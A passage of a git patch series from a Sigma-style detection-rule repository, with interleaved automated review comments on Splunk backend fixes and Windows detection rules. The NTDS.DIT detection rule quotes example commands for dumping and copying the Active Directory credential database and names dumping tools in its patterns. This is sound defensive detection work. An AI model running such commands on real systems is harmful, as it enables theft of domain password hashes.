00:00:00 2001 
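Review bot: Reverting the condition to `( selection1 and not filter1 ) or ( selection2 and not filter2 ) and not 1 of gen_filter*` in the second hunk reintroduces the precedence problem the reverted commit fixed: in Sigma condition syntax `and` binds tighter than `or`, so `not 1 of gen_filter*` applies only to the `selection2` branch and the generic filters are ignored whenever `selection1` matches. If the revert is only meant to undo the merge, the grouped form `condition: (( selection1 and not filter1 ) or ( selection2 and not filter2 )) and not 1 of gen_filter*` should be re-applied afterwards. The first hunk also steps `modified:` back to 2022/09/05, which would need to move forward again with that change.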
From: Thomas Patzke Date: Fri, 9 Sep 2022 22:26:13 +0200 Subject: [PATCH 59/73] Revert "Wrapped all-modifier result into NodeSubexpression" This reverts commit 1fbd2bba4dcddfa0223a1d34dea893be6d3f9913. --- tools/sigma/parser/modifiers/transform.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/sigma/parser/modifiers/transform.py b/tools/sigma/parser/modifiers/transform.py index b66eaf9c9..8a5267999 100644 --- a/tools/sigma/parser/modifiers/transform.py +++ b/tools/sigma/parser/modifiers/transform.py @@ -72,7 +72,7 @@ class SigmaAllValuesModifier(SigmaTransformModifier): cond = ConditionAND() for val in self.value: cond.add(val) - return NodeSubexpression(cond) + return cond class SigmaBase64Modifier(ListOrStringModifierMixin, SigmaTransformModifier): """Encode strings with Base64""" From 7afcf24d21121ed5e00f570f0999b8d2466f7e79 Mon Sep 17 00:00:00 2001 From: Thomas Patzke Date: Fri, 9 Sep 2022 22:30:00 +0200 Subject: [PATCH 60/73] Splunk puts AND always into parentheses New fix for issue #3443 --- tools/sigma/backends/splunk.py | 3 +++ 1 file changed, 3 insertions(+) diff --git a/tools/sigma/backends/splunk.py b/tools/sigma/backends/splunk.py index ca294f5c3..7d8ef1eb5 100644 --- a/tools/sigma/backends/splunk.py +++ b/tools/sigma/backends/splunk.py @@ -48,6 +48,9 @@ class SplunkBackend(SingleTextQueryBackend): raise TypeError("List values must be strings or numbers") return "(" + (" OR ".join(['%s=%s' % (key, self.generateValueNode(item)) for item in value])) + ")" + def generateANDNode(self, node): + return "(" + super().generateANDNode(node) + ")" + def generateAggregation(self, agg): if agg == None: return "" From c6e633bf30cc294092299fecc375328bf8f83111 Mon Sep 17 00:00:00 2001 From: Thomas Patzke Date: Fri, 9 Sep 2022 22:48:08 +0200 Subject: [PATCH 61/73] Release 0.22.1 --- CHANGELOG.md | 8 ++++++++ tools/setup.py | 2 +- 2 files changed, 9 insertions(+), 1 deletion(-) 
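Review bot: The new `generateANDNode` override in `SplunkBackend` has no docstring, so the reason for unconditionally wrapping every AND expression in parentheses lives only in the commit message. Since this is a deliberate workaround that a later maintainer may be tempted to simplify away, a one-line docstring such as `"""Always parenthesize AND nodes so SPL evaluates OR/AND precedence as the rule intends (fix for issue #3443)."""` would preserve the rationale. The CHANGELOG entry in [PATCH 61/73] already notes the redundant parentheses this produces; referencing it from the code would help.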
diff --git a/CHANGELOG.md b/CHANGELOG.md index f5c1ee9e5..2b267dfec 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -6,6 +6,14 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/), and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html) from version 0.14.0. +## 0.22.1 - 2022-09-09 + +### Fixed + +* Replaced generic fix for Splunk AND/OR precedence issue with a specific one because the initial fix broke too many + backends. Splunk queries now have generally parentheses around AND expressions, sometimes more. Use sigma-cli/pySigma + for cleaner Splunk queries. + ## 0.22 - 2022-09-08 ### Added diff --git a/tools/setup.py b/tools/setup.py index efeceb551..c70d80d28 100644 --- a/tools/setup.py +++ b/tools/setup.py @@ -14,7 +14,7 @@ with open(path.join(here, 'LONG_DESCRIPTION.md'), encoding='utf-8') as f: setup( name='sigmatools', - version='0.22.0', + version='0.22.1', description='Tools for the Generic Signature Format for SIEM Systems', long_description=long_description, long_description_content_type="text/markdown", From 2552b75e72b71bd05cd7a9b8298525c079d784ac Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Fri, 9 Sep 2022 23:11:28 +0200 Subject: [PATCH 62/73] Delete proc_creation_win_net_add_local_user.yml --- .../proc_creation_win_net_add_local_user.yml | 26 ------------------- 1 file changed, 26 deletions(-) delete mode 100644 rules/windows/process_creation/proc_creation_win_net_add_local_user.yml diff --git a/rules/windows/process_creation/proc_creation_win_net_add_local_user.yml b/rules/windows/process_creation/proc_creation_win_net_add_local_user.yml deleted file mode 100644 index d7cc1ee7b..000000000 --- a/rules/windows/process_creation/proc_creation_win_net_add_local_user.yml +++ /dev/null 
@@ -1,26 +0,0 @@ -title: Net User Add Local User -id: 57ea3cf7-f2bf-419f-b51e-6a60635ebf0d -status: stable -description: Detects attempts to add new local user -references: - - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html -author: Nasreddine Bencherchali -date: 2022/09/09 -tags: - - attack.persistence - - attack.t1136.001 -logsource: - category: process_creation - product: windows -detection: - selection: - Image|endswith: - - '\net.exe' - - '\net1.exe' - CommandLine|contains|all: - - ' user ' - - '/add' - condition: selection -falsepositives: - - Legitimate use of net.exe utility by legitimate users and admins to add local user -level: low From 9ed14ce5718ba09ee83c4187b12bfa2f92588c46 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sat, 10 Sep 2022 09:34:16 +0200 Subject: [PATCH 63/73] tightened the regular expression --- .../file_event/file_event_win_wmiexec_default_filename.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/file_event/file_event_win_wmiexec_default_filename.yml b/rules/windows/file_event/file_event_win_wmiexec_default_filename.yml index e65d0b42c..daa4a4a85 100644 --- a/rules/windows/file_event/file_event_win_wmiexec_default_filename.yml +++ b/rules/windows/file_event/file_event_win_wmiexec_default_filename.yml @@ -14,7 +14,7 @@ logsource: product: windows detection: selection: - TargetFilename|re: '__\d{10}\.\d{1,7}' + TargetFilename|re: '\\Windows\\__1\d{9}\.\d{1,7}$' condition: selection falsepositives: - Unlikely From a616647b0886c7a4b68ace90e35650c1a64e1f24 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sat, 10 Sep 2022 09:48:50 +0200 Subject: [PATCH 64/73] lowered score of scheduled task + SYSTEM rule --- .../proc_creation_win_susp_schtasks_schedule_type_system.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
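Review bot: The tightened pattern `'\\Windows\\__1\d{9}\.\d{1,7}$'` now requires a literal `\Windows\` path component, whereas the previous `__\d{10}\.\d{1,7}` was path-agnostic; with backends where the `re` modifier is case-sensitive, a path logged in lowercase such as `c:\windows\...` would no longer match. If case-insensitive matching is intended, consider `'(?i)\\Windows\\__1\d{9}\.\d{1,7}$'` where the target backend supports inline flags, or document the assumption in the rule. The leading `1` in `__1\d{9}` also presumably encodes the current range of ten-digit epoch timestamps; a comment noting that would keep it from silently aging out.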
diff --git a/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type_system.yml b/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type_system.yml index b2fc3c9a1..22eb46376 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type_system.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type_system.yml @@ -34,4 +34,4 @@ detection: condition: all of selection_* falsepositives: - Some installers were seen using this method of creation unfortunately. Filter them in your environment -level: high +level: medium From a053be791c30eff760c8ce50285f8a24506905bc Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sat, 10 Sep 2022 09:49:14 +0200 Subject: [PATCH 65/73] Update proc_creation_win_user_discovery_get_aduser.yml --- .../proc_creation_win_user_discovery_get_aduser.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_user_discovery_get_aduser.yml b/rules/windows/process_creation/proc_creation_win_user_discovery_get_aduser.yml index 6e5505cdf..663102824 100644 --- a/rules/windows/process_creation/proc_creation_win_user_discovery_get_aduser.yml +++ b/rules/windows/process_creation/proc_creation_win_user_discovery_get_aduser.yml @@ -24,7 +24,7 @@ detection: condition: all of selection_* falsepositives: - Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often -level: high +level: medium tags: - attack.discovery - attack.t1033 From c98997390bc3fb8686968591d40cea6154d52e81 Mon Sep 17 00:00:00 2001 
From: David ANDRE Date: Sun, 11 Sep 2022 12:35:05 +0200 Subject: [PATCH 66/73] Changes following advice --- .../image_load_vmware_nondefault_path.yml | 28 +++++++++++++++++++ .../proc_creation_win_renamed_vmnat.yml | 13 +++++---- 2 files changed, 36 insertions(+), 5 deletions(-) create mode 100644 rules/windows/image_load/image_load_vmware_nondefault_path.yml diff --git a/rules/windows/image_load/image_load_vmware_nondefault_path.yml b/rules/windows/image_load/image_load_vmware_nondefault_path.yml new file mode 100644 index 000000000..07386cf30 --- /dev/null +++ b/rules/windows/image_load/image_load_vmware_nondefault_path.yml @@ -0,0 +1,28 @@ +title: Renamed or Portable Vmnat.exe +id: 7c92840f-3d4e-4cd7-ae44-e321e9281ab1 +status: experimental +description: Detects renamed vmnat.exe or portable version that can be use for DLL side-loading +author: elhoim +date: 2022/09/09 +references: + - https://twitter.com/malmoeb/status/1525901219247845376 +tags: + - attack.defense_evasion + - attack.t1574.002 +logsource: + category: image_load + product: windows +detection: + selection: + Product: 'Vmware Workstation' + filter_rename: + Image|endswith: 'vmnat.exe' + filter_portable: + Image: + - 'C:\Program Files (x86)\VMware\VMware Workstation\vmnat.exe' + - 'C:\Windows\SysWOW64\vmnat.exe' + # TODO check @work if need to add System32 too (and/pr others) + condition: selection and not 1 of filter_* +falsepositives: + - VMware workstation installed in another path +level: critical diff --git a/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml b/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml index d7f2d8be8..f1721243d 100644 --- a/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml +++ b/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml 
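Review bot: The selection `Product: 'Vmware Workstation'` combined with filters on `Image` appears to conflate the two images in an image_load event: in Sysmon event 7, `Product` describes the loaded module while `Image` is the loading process, so any VMware Workstation process other than vmnat.exe loading one of its own DLLs would match at level critical. If the goal is a renamed or relocated vmnat.exe, the filters should be expressed on the module (`ImageLoaded`/`OriginalFileName`) or the rule should state explicitly which side it selects on — confirm which field the author meant. Independently, `filter_rename: Image|endswith: 'vmnat.exe'` lacks a leading `\` anchor, and the `# TODO check @work ...` comment should not ship in a rule (the file is removed again in [PATCH 69/73]).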
@@ -1,7 +1,7 @@ -title: Proc Creation Win Renamed Vmnat.exe +title: Renamed or Portable Vmnat.exe id: 7b4f794b-590a-4ad4-ba18-7964a2832205 status: experimental -description: Detects renamed vmnat.exe (Legitimate file from VMware workstation) for DLL side-loading +description: Detects renamed vmnat.exe or portable version that can be used for DLL side-loading author: elhoim date: 2022/09/09 references: @@ -15,9 +15,12 @@ logsource: detection: selection: OriginalFileName: 'vmnat.exe' - filter: + filter_rename: Image|endswith: 'vmnat.exe' - condition: selection and not filter -falsepositives: + filter_portable: + Image: + - 'C:\Program Files (x86)\VMware\VMware Workstation\vmnat.exe' + - 'C:\Windows\SysWOW64\vmnat.exe' + condition: selection and not 1 of filter_* - Unknown level: high From 5b0c8f60e28bb5d99ee0e5a3339b51e6e4a7e57c Mon Sep 17 00:00:00 2001 From: David ANDRE Date: Sun, 11 Sep 2022 12:36:44 +0200 Subject: [PATCH 67/73] Removed trailing space --- .../process_creation/proc_creation_win_renamed_vmnat.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml b/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml index f1721243d..000b99070 100644 --- a/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml +++ b/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml @@ -18,7 +18,7 @@ detection: filter_rename: Image|endswith: 'vmnat.exe' filter_portable: - Image: + Image: - 'C:\Program Files (x86)\VMware\VMware Workstation\vmnat.exe' - 'C:\Windows\SysWOW64\vmnat.exe' condition: selection and not 1 of filter_* From d73aac41d36f7f42db94afb92f76854b5824ab94 Mon Sep 17 00:00:00 2001 From: David ANDRE Date: Sun, 11 Sep 2022 12:44:54 +0200 Subject: [PATCH 68/73] Changes based on advice --- .../proc_creation_win_renamed_vmnat.yml | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) 
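Review bot: The second hunk (`@@ -15,9 +15,12 @@`) deletes the `falsepositives:` key but leaves its `- Unknown` item in place, so the resulting file has a list item dangling under the `detection:` mapping and is no longer valid YAML; the same hunk is re-applied unchanged in [PATCH 68/73], and [PATCH 70/73] restores the key. The intended change was to add the `filter_portable` block and the new condition while keeping `falsepositives:` directly after `condition: selection and not 1 of filter_*`. The `Image: ` trailing space introduced here is fixed separately by [PATCH 67/73].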
diff --git a/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml b/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml index d7f2d8be8..000b99070 100644 --- a/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml +++ b/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml @@ -1,7 +1,7 @@ -title: Proc Creation Win Renamed Vmnat.exe +title: Renamed or Portable Vmnat.exe id: 7b4f794b-590a-4ad4-ba18-7964a2832205 status: experimental -description: Detects renamed vmnat.exe (Legitimate file from VMware workstation) for DLL side-loading +description: Detects renamed vmnat.exe or portable version that can be used for DLL side-loading author: elhoim date: 2022/09/09 references: @@ -15,9 +15,12 @@ logsource: detection: selection: OriginalFileName: 'vmnat.exe' - filter: + filter_rename: Image|endswith: 'vmnat.exe' - condition: selection and not filter -falsepositives: + filter_portable: + Image: + - 'C:\Program Files (x86)\VMware\VMware Workstation\vmnat.exe' + - 'C:\Windows\SysWOW64\vmnat.exe' + condition: selection and not 1 of filter_* - Unknown level: high From 262f0463519e096d2a2f8864c4a63d5fce739cd4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?David=20Andr=C3=A9?= Date: Sun, 11 Sep 2022 13:07:23 +0200 Subject: [PATCH 69/73] Delete image_load_vmware_nondefault_path.yml File added in wrong branch --- .../image_load_vmware_nondefault_path.yml | 28 ------------------- 1 file changed, 28 deletions(-) delete mode 100644 rules/windows/image_load/image_load_vmware_nondefault_path.yml diff --git a/rules/windows/image_load/image_load_vmware_nondefault_path.yml b/rules/windows/image_load/image_load_vmware_nondefault_path.yml deleted file mode 100644 index 07386cf30..000000000 --- a/rules/windows/image_load/image_load_vmware_nondefault_path.yml +++ /dev/null 
@@ -1,28 +0,0 @@ -title: Renamed or Portable Vmnat.exe -id: 7c92840f-3d4e-4cd7-ae44-e321e9281ab1 -status: experimental -description: Detects renamed vmnat.exe or portable version that can be use for DLL side-loading -author: elhoim -date: 2022/09/09 -references: - - https://twitter.com/malmoeb/status/1525901219247845376 -tags: - - attack.defense_evasion - - attack.t1574.002 -logsource: - category: image_load - product: windows -detection: - selection: - Product: 'Vmware Workstation' - filter_rename: - Image|endswith: 'vmnat.exe' - filter_portable: - Image: - - 'C:\Program Files (x86)\VMware\VMware Workstation\vmnat.exe' - - 'C:\Windows\SysWOW64\vmnat.exe' - # TODO check @work if need to add System32 too (and/pr others) - condition: selection and not 1 of filter_* -falsepositives: - - VMware workstation installed in another path -level: critical From 93da67b593c5692906a4152fabec835c9cb320f0 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?David=20Andr=C3=A9?= Date: Sun, 11 Sep 2022 13:13:58 +0200 Subject: [PATCH 70/73] Update proc_creation_win_renamed_vmnat.yml Added accidentaly removed falsepositives --- .../windows/process_creation/proc_creation_win_renamed_vmnat.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml b/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml index 000b99070..9e1c9e924 100644 --- a/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml +++ b/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml @@ -22,5 +22,6 @@ detection: - 'C:\Program Files (x86)\VMware\VMware Workstation\vmnat.exe' - 'C:\Windows\SysWOW64\vmnat.exe' condition: selection and not 1 of filter_* +falsepositives: - Unknown level: high From 1eaad811b66d9beed129f194d576ea536c4faad5 Mon Sep 17 00:00:00 2001 
From: Qasim Qlf Date: Mon, 12 Sep 2022 14:15:48 +0500 Subject: [PATCH 71/73] tag added --- .../windows/process_creation/proc_creation_win_apt_mercury.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/rules/windows/process_creation/proc_creation_win_apt_mercury.yml b/rules/windows/process_creation/proc_creation_win_apt_mercury.yml index 0aeb0543b..0cb982d1b 100644 --- a/rules/windows/process_creation/proc_creation_win_apt_mercury.yml +++ b/rules/windows/process_creation/proc_creation_win_apt_mercury.yml @@ -6,10 +6,12 @@ references: - https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/ author: Florian Roth date: 2022/08/26 +modified: 2022/09/12 logsource: category: process_creation product: windows tags: + - attack.execution - attack.t1059.001 - attack.g0069 detection: From 0bbb679e38cdf553db2829d06cb859fe9b6ce2be Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 12 Sep 2022 13:29:51 +0200 Subject: [PATCH 72/73] fix: FPs with veam backup shell --- .../proc_creation_win_ntfs_short_name_path_use_cli.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml index 76b3888e5..6fe080f91 100644 --- a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml +++ b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml @@ -11,7 +11,7 @@ references: - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN - https://twitter.com/frack113/status/1555830623633375232 date: 2022/08/07 -modified: 2022/08/12 +modified: 2022/09/12 logsource: category: process_creation product: windows 
@@ -27,6 +27,7 @@ detection: - ParentImage|endswith: - '\WebEx\WebexHost.exe' - '\thor\thor64.exe' + - '\veam.backup.shell.exe' condition: selection and not filter falsepositives: - Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process. From 5f164ebe1279ce9b38941dc67fb68b686d172e46 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 12 Sep 2022 13:30:14 +0200 Subject: [PATCH 73/73] style: indentation --- .../proc_creation_win_susp_ntds.yml | 108 +++++++++--------- 1 file changed, 54 insertions(+), 54 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_susp_ntds.yml b/rules/windows/process_creation/proc_creation_win_susp_ntds.yml index 42b539ce4..0775c1450 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_ntds.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_ntds.yml 
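Review bot: The new filter entry `'\veam.backup.shell.exe'` looks like a misspelling of the Veeam binary, which is normally `Veeam.Backup.Shell.exe` (two e's); if so, the exclusion will never match and the false positives the commit describes will persist. Please confirm the exact `ParentImage` value observed and, if it is the Veeam shell, use `- '\Veeam.Backup.Shell.exe'`. The enclosing `filter` block starts outside the hunk.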
@@ -4,63 +4,63 @@ description: Detects suspicious process patterns used in NTDS.DIT exfiltration status: experimental author: Florian Roth references: - - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration - - https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/ - - https://pentestlab.blog/tag/ntds-dit/ - - https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1 - - https://github.com/zcgonvh/NTDSDumpEx - - https://github.com/rapid7/metasploit-framework/blob/d297adcebb5c1df6fe30b12ca79b161deb71571c/data/post/powershell/NTDSgrab.ps1 - - https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1 + - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration + - https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/ + - https://pentestlab.blog/tag/ntds-dit/ + - https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1 + - https://github.com/zcgonvh/NTDSDumpEx + - https://github.com/rapid7/metasploit-framework/blob/d297adcebb5c1df6fe30b12ca79b161deb71571c/data/post/powershell/NTDSgrab.ps1 + - https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1 date: 2022/03/11 tags: - - attack.credential_access - - attack.t1003.003 + - attack.credential_access + - attack.t1003.003 logsource: - product: windows - category: process_creation + product: windows + category: process_creation detection: - selection_tool: - # https://github.com/zcgonvh/NTDSDumpEx - - Image|endswith: - - '\NTDSDump.exe' - - '\NTDSDumpEx.exe' - - CommandLine|contains|all: - # ntdsdumpex.exe -d ntds.dit -o hash.txt -s system.hiv - - 'ntds.dit' - - 'system.hiv' - - CommandLine|contains: 'NTDSgrab.ps1' - selection_oneliner_1: - # powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q" - CommandLine|contains|all: - - 'ac i ntds' - - 'create 
full' - selection_onliner_2: - # cmd.exe /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit - CommandLine|contains|all: - - '/c copy ' - - '\windows\ntds\ntds.dit' - selection_powershell: - CommandLine|contains|all: - - 'powershell' - - 'ntds.dit' - set1_selection_ntds_dit: - CommandLine|contains: 'ntds.dit' - set1_selection_image_folder: - - ParentImage|contains: - - '\apache' - - '\tomcat' - - '\AppData\' - - '\Temp\' - - '\Public\' - - '\PerfLogs\' - - Image|contains: - - '\apache' - - '\tomcat' - - '\AppData\' - - '\Temp\' - - '\Public\' - - '\PerfLogs\' - condition: 1 of selection* or all of set1* + selection_tool: + # https://github.com/zcgonvh/NTDSDumpEx + - Image|endswith: + - '\NTDSDump.exe' + - '\NTDSDumpEx.exe' + - CommandLine|contains|all: + # ntdsdumpex.exe -d ntds.dit -o hash.txt -s system.hiv + - 'ntds.dit' + - 'system.hiv' + - CommandLine|contains: 'NTDSgrab.ps1' + selection_oneliner_1: + # powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q" + CommandLine|contains|all: + - 'ac i ntds' + - 'create full' + selection_onliner_2: + # cmd.exe /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit + CommandLine|contains|all: + - '/c copy ' + - '\windows\ntds\ntds.dit' + selection_powershell: + CommandLine|contains|all: + - 'powershell' + - 'ntds.dit' + set1_selection_ntds_dit: + CommandLine|contains: 'ntds.dit' + set1_selection_image_folder: + - ParentImage|contains: + - '\apache' + - '\tomcat' + - '\AppData\' + - '\Temp\' + - '\Public\' + - '\PerfLogs\' + - Image|contains: + - '\apache' + - '\tomcat' + - '\AppData\' + - '\Temp\' + - '\Public\' + - '\PerfLogs\' + condition: 1 of selection* or all of set1* falsepositives: - - Unknown + - Unknown level: high